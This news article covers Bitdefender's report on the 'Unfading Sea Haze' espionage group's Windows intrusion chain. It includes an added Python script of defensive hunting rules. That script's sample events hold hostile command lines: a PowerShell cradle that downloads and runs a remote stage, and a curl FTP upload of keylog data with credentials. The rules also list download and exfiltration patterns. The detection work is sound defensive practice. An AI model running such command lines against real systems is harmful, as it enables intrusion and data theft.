'China-aligned' spyware slingers operating since 2018 unmasked at last
Unfading Sea Haze adept at staying under the radar
Bitdefender says it has tracked down and exposed an online gang that has been operating since 2018 nearly without a trace – and likely working for Chinese interests.
A report from the antivirus maker details the miscreants – dubbed Unfading Sea Haze – and their methods for breaking into Windows PCs and infecting them with data-stealing spyware.
The group's attacks – which have hit at least government and military targets – were "sophisticated" and focused on "flexibility and evasion techniques," it's claimed.
The origin and ultimate goals of Unfading Sea Haze aren't absolutely clear to Bitdefender, but it states with confidence that the attacks it investigated don't map to any already known outfit. According to the report, the crew's country of origin is most likely China: it cites Unfading Sea Haze's attacks on nations in or around the South China Sea, the group's use of tools popular in China, and one specific technique that resembles the tradecraft of APT41, another Chinese state-sponsored entity.
None of this is a slam-dunk in terms of attribution, and could be deliberate obfuscation, but still, now you know.
The South China Sea is a strategically important area for China, and many countries lay claim to part of it – such as Malaysia, the Philippines, and Vietnam. The Middle Kingdom notably claims nearly all of it, as marked by the so-called Nine-Dash Line.
"The lack of a definitive match and the presence of these suggestive clues paint a picture of a sophisticated threat actor with connections to the Chinese cyber ecosystem," the investigators argue.
The report observes that Unfading Sea Haze's earliest known intrusions into Windows systems date back at least six years. Bitdefender was able to confirm that the attackers used spear phishing to gain initial access.
Spear phishing usually indicates that a team is particularly interested in a handful of targets, such as engineers to steal blueprints from or politicians and activists to snoop on. And indeed, we're told at least eight organizations were hit by the gang, most of which were either government agencies or military operations.
According to the research, published Wednesday, Unfading Sea Haze sent emails carrying zip archives that contained .LNK shortcut files disguised as documents; when opened, a shortcut executed a string of Windows commands.
The commands would download a file from an Unfading Sea Haze server to disk, wait ten seconds, and then execute the file via MSBuild.
In March this year, the crew refined this execution chain so that the downloaded payload is no longer written to disk: a combination of PowerShell and MSBuild runs it from memory instead, which helps it evade file-based detection.
The downloaded code would then set up scheduled tasks that launch benign, legitimate-looking programs, which in turn load malicious DLLs, a classic DLL sideloading arrangement. Those DLLs would log keystrokes, copy sensitive data stored in browsers, and scan removable drives to produce file listings.
All of this data, along with any files selected for exfiltration, was sent to the snoops over FTP using curl, initially with hardcoded credentials and later with dynamically generated ones.
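The chain above (a shortcut that runs shell commands, MSBuild executing a downloaded project, later a fileless PowerShell stage, scheduled tasks that sideload DLLs, and curl pushing data to FTP) is what a defender would hunt for in endpoint telemetry. The script below is an added example, not code from the Bitdefender report or from The Register: it runs a handful of hunting rules over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) events. Every path, address, credential, command line and rule name in it is constructed for illustration and is not an indicator from the report.

```python
"""Hunting rules for the execution chain described above, run offline over
constructed Sysmon-style events (EventID 1 = process create, 7 = image load).
Nothing here is an indicator from the Bitdefender report: every path, address
and command line is made up for the example."""
import re
from pathlib import PureWindowsPath

# Directories an unprivileged user can write to. A build tool, a task action or
# a DLL living here deserves a look; a System32 or Program Files path much less so.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads)|programdata|windows\\temp|users\\public)\\",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE)
IN_MEMORY_EXEC = re.compile(r"\biex\b|invoke-expression|msbuild", re.IGNORECASE)
FTP_URL = re.compile(r"ftps?://", re.IGNORECASE)
CURL_UPLOAD_FLAG = re.compile(r"(^|\s)(-T|--upload-file)(\s|$)")  # case matters: curl -t is telnet
TASK_ACTION = re.compile(r'/tr\s+"?([^"]+)', re.IGNORECASE)


def exe_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def msbuild_from_script_host(ev: dict) -> bool:
    """MSBuild is a build tool; spawned by a shell, or pointed at a project file
    in a user-writable directory, it is acting as a living-off-the-land loader."""
    if ev["EventID"] != 1 or exe_name(ev["Image"]) != "msbuild.exe":
        return False
    return exe_name(ev["ParentImage"]) in SCRIPT_HOSTS or bool(USER_WRITABLE.search(ev["CommandLine"]))


def fileless_powershell_cradle(ev: dict) -> bool:
    """A download primitive and in-memory execution (IEX or MSBuild) in one command line."""
    if ev["EventID"] != 1 or exe_name(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = ev["CommandLine"]
    return bool(DOWNLOAD_CRADLE.search(cl) and IN_MEMORY_EXEC.search(cl))


def task_action_in_user_writable_path(ev: dict) -> bool:
    """schtasks /create whose action (/tr) is a binary in a user-writable path."""
    if ev["EventID"] != 1 or exe_name(ev["Image"]) != "schtasks.exe":
        return False
    cl = ev["CommandLine"]
    action = TASK_ACTION.search(cl)
    return "/create" in cl.lower() and action is not None and bool(USER_WRITABLE.search(action.group(1)))


def unsigned_dll_from_user_writable_path(ev: dict) -> bool:
    """Image-load event: an unsigned DLL loaded from a user-writable path, the
    footprint of a benign host executable sideloading a malicious DLL."""
    if ev["EventID"] != 7:
        return False
    return ev.get("Signed", "").lower() == "false" and bool(USER_WRITABLE.search(ev["ImageLoaded"]))


def curl_ftp_upload(ev: dict) -> bool:
    """curl uploading (-T / --upload-file) to an ftp:// or ftps:// destination."""
    if ev["EventID"] != 1 or exe_name(ev["Image"]) != "curl.exe":
        return False
    cl = ev["CommandLine"]
    return bool(FTP_URL.search(cl) and CURL_UPLOAD_FLAG.search(cl))


RULES = {
    "msbuild_from_script_host": msbuild_from_script_host,
    "fileless_powershell_cradle": fileless_powershell_cradle,
    "task_action_in_user_writable_path": task_action_in_user_writable_path,
    "unsigned_dll_from_user_writable_path": unsigned_dll_from_user_writable_path,
    "curl_ftp_upload": curl_ftp_upload,
}


def hunt(events: list) -> list:
    """One finding per (event, rule) match, in event order."""
    return [{"rule": name, "pid": ev["ProcessId"], "image": ev["Image"]}
            for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: a hostile chain interleaved with benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c timeout 10 && MSBuild.exe C:\Users\alice\AppData\Local\Temp\report.xml"},
    {"EventID": 1, "ProcessId": 4188, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\report.xml"},
    {"EventID": 1, "ProcessId": 4220, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.9/stage.txt'))"},
    {"EventID": 1, "ProcessId": 4301, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /create /tn "SystemUpdate" /tr "C:\ProgramData\Tools\updater.exe" /sc minute /mo 30'},
    {"EventID": 7, "ProcessId": 5012, "Image": r"C:\ProgramData\Tools\updater.exe",
     "ImageLoaded": r"C:\ProgramData\Tools\version.dll", "Signed": "false"},
    {"EventID": 1, "ProcessId": 4410, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\ProgramData\Tools\updater.exe",
     "CommandLine": r"curl.exe -u uploader:Sup3rSecret -T C:\Users\alice\AppData\Local\Temp\kl.dat ftp://198.51.100.20/incoming/"},
    {"EventID": 1, "ProcessId": 6002, "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"EventID": 1, "ProcessId": 6010, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -sS https://example.com/api/health -o health.json"},
    {"EventID": 7, "ProcessId": 6100, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{finding['rule']:38} pid={finding['pid']} {finding['image']}")
```

These are hunting rules rather than blocking signatures: a build server or a developer box will trip the MSBuild rule legitimately, and the image-load rule needs Sysmon's Event ID 7 enabled with signature checking, which is noisy on busy hosts. The value of the set is correlation: one host producing an MSBuild-from-shell hit, a task action in ProgramData and a curl FTP upload within minutes of each other is worth an analyst's time even when each alert alone is not.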
Dangerous due to their ability to adapt
The Bitdefender report argues that part of the attacks' effectiveness was thanks to "poor credential hygiene and inadequate patching practices on exposed devices and web services." In other words, the eight victim organizations – most of which were either government agencies or military systems – had lax security in some way or another.
On the other hand, Unfading Sea Haze didn't get by just on luck. "The extended period of Unfading Sea Haze's invisibility, exceeding five years for a likely nation-state actor, is particularly concerning," Bitdefender notes. "Their custom malware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion techniques."
Attackers affiliated with Unfading Sea Haze have progressively changed both their methods and their tools. Since the outfit had gone unnoticed until now, those changes look more like planned evolution than reactions to close calls or other incidents.
China-backed cyber-snoops aren't anything new, and they've been prolific on a global scale, having compromised at least 70 organizations and targeted more than 116 spread across 23 countries. Cynics might say Unfading Sea Haze went undetected because it's not that significant in the grand scheme of things, though Bitdefender argues otherwise, saying the crew went after high-level targets.
We asked Bitdefender for further details, and the firm declined. "We understand the public's interest, but for security reasons, we can't disclose specific countries or organizations," senior director Steve Fiore explained to The Register.
"However, we can confirm the targets resemble those typically linked to Chinese nation-state actors. Our Bitdefender Labs and MDR teams are continuously monitoring the situation to provide further insights."
See the report for technical details, including indicators of compromise and guidance on detecting and blocking attacks like those of Unfading Sea Haze. ®